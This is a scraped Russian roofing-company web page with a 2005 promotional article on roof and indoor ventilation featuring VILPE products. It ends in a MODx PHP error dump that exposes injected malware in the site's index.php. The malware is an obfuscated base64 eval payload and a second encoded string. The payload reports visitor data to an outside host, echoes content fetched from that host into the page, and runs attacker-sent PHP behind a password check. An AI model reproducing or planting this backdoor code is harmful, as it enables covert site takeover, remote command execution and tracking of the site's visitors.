Гибкая
черепица
+7 (495) 234-41-41
8 (800) 234-41-10
заказать звонок
Вконтакте Twitter Facebook Youtube
Рус / Eng

8/02/2005. Что нужно знать при выборе системы вентиляции кровли и помещений?

кровельная 
вентиляцияХорошо организованный дом невозможно представить без качественной системы вентиляции. Причем, речь пойдет не о сложных и дорогостоящих «интеллектуальных» системах, а доступных технических решениях, которые позволят многократно продлить срок службы вашего жилища.

Для создания вентиляции подкровельного пространства и нормального воздухообмена внутренних помещений необходимо предусмотреть два момента:

  • систему вентиляции подкровельного пространства;
  • систему принудительной вентиляции внутренних помещений.

Использование современных строительных материалов также приводит к необходимости использования этих двух систем вентиляции.

Что будет происходить в подкровельном пространстве при отсутствии вентиляции?

 

Если отсутствуют элементы для вытяжки воздуха из подкровельного воздушного зазора, то:

  • в теплое время года вся несущая конструкция и теплоизоляция насыщаются парами, что приводит к гниению и образованию грибка, сырости и неприятных запахов (рис. 1);

  • накопление влаги в утеплителе сводит на «нет» теплоизолирующие свойства применяемых материалов, а ведь теплоизоляция помимо функций по утеплению защищает стены и кровлю от воздействия переменных температур наружного воздуха;
  • возможно образование протечек;
  • во время резких перепадов температур наблюдается образование конденсата на внутренней поверхности кровельного материала, что отрицательно влияет на долговечность кровельных конструкций (плесень и грибок поедают древесину, неизбежно появляется ржавчина на стальных элементах конструкции);
  •  отсутствие циркуляции воздуха в подкровельном вентиляционном зазоре приводит к повышенному образованию ледяных барьеров на поверхности кровельного материала, а это в свою очередь ведет к увеличению механической нагрузки на стропильную систему, а также к увеличению вероятности лавинообразного схода снега с крыши;
  • в жару возрастает возможность существенного повышения температуры внутри помещений и сильного перегревания кровельного материала;
  • увеличиваются ваши расходы на отопление в зимнее время и кондиционирование в летнее время;
  • вследствие образования наледей и лавинообразного схода снега в отсутствие правильной системы вентиляции кровли уменьшается срок службы водосточной системы.

Пути решения проблемы вентиляции подкровельного пространства

 

  • Традиционные методы вентиляции

Несмотря на появление современных методов вентиляции, многие владельцы частных домов до сих пор продолжают использовать традиционный метод вытяжной вентиляции с применением кирпичных труб. Рассмотрим недостатки такого метода при маленьких преимуществах. При организации естественной вентиляции, используют вентиляционные шахты, которые проходят по внутренним стенам дома. После последнего перекрытия эти шахты формируют в виде кирпичных труб не обходимой высоты, которые проходят сквозь кровельный пирог.


- традиционный дизайн

- низкая теплопроводность


- тяжелая конструкция дает большую дополнительную нагрузку на перекрытие и на всю конструкцию здания;

- необходимо доукомплектовывать специальным колпаком;

- сложно сделать герметичное примыкание кровельного материала к стенам трубы.

- наблюдается постоянная коррозия облицовочного камня или штукатурки трубы, что вызывает большие затраты на ремонт.

- отсутствует возможность отклонения вентиляционного канала от вертикальной оси, что часто приводит к расположению трубы в ендовой, а следствием этого становится повышенное образование снежно-ледовой нагрузки в ендовой. Кроме того, усложняется выполнение в этом месте работ по монтажу кровельного материала.

  • Преимущества систем кровельной вентиляции

Система вентиляции подкровельного пространства состоит из следующих основных элементов:

1. Кровельные вентиляторы (дефлекторы) Alipai – для вентиляции подкровельного пространства на скатных кровлях, а также для отвода влажного воздуха из-под кровельного ковра при использовании на плоских эксплуатируемых кровлях (рис. 2);

кровельные проходки

2. KTV-вентили - удаляют влагу из кровельных конструкций мансард и чердачных помещений (рис. 3).

вентили и проходки 
vilpe


- осуществляется проветривание подкровельного пространства;

- исключает образование конденсата и наледей;

- продлевает срок службы всех кровельных конструкций;

- продлевает срок службы водосточной системы;

- служит изоляцией от излишнего тепла;

- снижает энергозатраты;

- легкий и быстрый монтаж, так же возможно монтировать системы уже на готовые кровельные покрытия;

- разработано несколько вариантов систем, практически для любых уклонов скатов крыш, а также герметичные проходные элементы для любых кровельных систем.

Для чего нужна система вентиляции внутренних помещений?

1. Что будет происходить в помещении при отсутствии вентиляции внутренних помещений?

Для поддержания качества воздуха в рамках санитарных норм в построенных из современных материалов коттеджах требуется использование систем принудительного воздухообмена. Жизнедеятельность людей, эмиссия газов и частиц из строительных конструкций, поднимающийся из почвы в помещения газ радон приводят к тому, что в доме, согласно европейским нормам, требуется полная замена воздуха каждые 2 часа. Если помещения не вентилируются, концентрация радона и других веществ может превысить допустимую норму, что отрицательно сказывается на здоровье.

2. Решение проблемы вентиляции внутренних помещений с помощью системы вентиляции Vilpe.

Для создания нормального воздухообмена в доме, изготовленном из современных материалов во избежание сырости и запахов необходимо предусмотреть систему принудительной вентиляции внутренних помещений. Систему принудительной вентиляции необходимо продумать уже на стадии проектирования частного дома.

Vilpe - это широкий выбор электровентиляторов трех типов, способных обеспечить принудительную вентиляцию как для частного строительства, так и для промышленных помещений. Мощности одного вентилятора VILPE достаточно для вентиляции дома площадью 200 м.кв. с полным замещением воздуха за 2 часа, как того требуют санитарные нормы.

В доме, оснащённом вентиляционной системой Vilpe, воздух всегда хорошо циркулирует, все помещения проветриваются и поддерживается нормальная влажность.

Дополнительными элементами системы являются:

  • Вентиляционные выходы VILPE – в зависимости от размера применяются как выходы вентилятора внутренних помещений или в качестве выхода кухонной вытяжки. Выходы направляют воздушные потоки, создают тягу и уменьшают сопротивление воздуха, а также защищают вентиляционную систему от попадания атмосферных осадков и грязи.
  • Проходные элементы VILPE – используются в комплекте с вентиляционными выходами и обеспечивают герметичное и удобное соединение любых вентиляционных выходов с кровлей.
  • Нельзя также забывать о таких важных элементах вентиляции, как канализационные и антенные выходы.
  • Канализационные выходы VILPE – вентиляционные выходы канализационного стояка на кровлю, используемые во избежание появления неприятных запахов и предотвращения образования газовых пробок, способных разрушающе действовать на канализационную систему.
  • Антенные выходы VILPE – предназначены для герметизации кровельных проходок антенн, флагштоков и труб диаметром до 90 мм.
Мы в:
MODx Content Manager 32 »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert() [function.assert]: Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /home/u199389/ruflex.ru/www/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0.0034 s(1 Requests)
  PHP: 0.2763 s 
  Total: 0.2797 s